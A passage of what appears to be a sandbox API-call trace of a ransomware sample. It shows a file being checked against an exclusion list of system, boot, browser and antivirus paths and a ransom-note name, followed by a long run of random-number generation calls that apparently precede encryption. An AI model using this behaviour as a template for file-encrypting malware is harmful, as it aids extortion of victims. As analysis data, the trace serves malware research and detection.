(pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.169] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.169] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.169] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.169] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.169] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.169] strlen (_Str="NMoreira") returned 0x8 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0173.172] CryptGenRandom (in: hProv=0x8bf310, 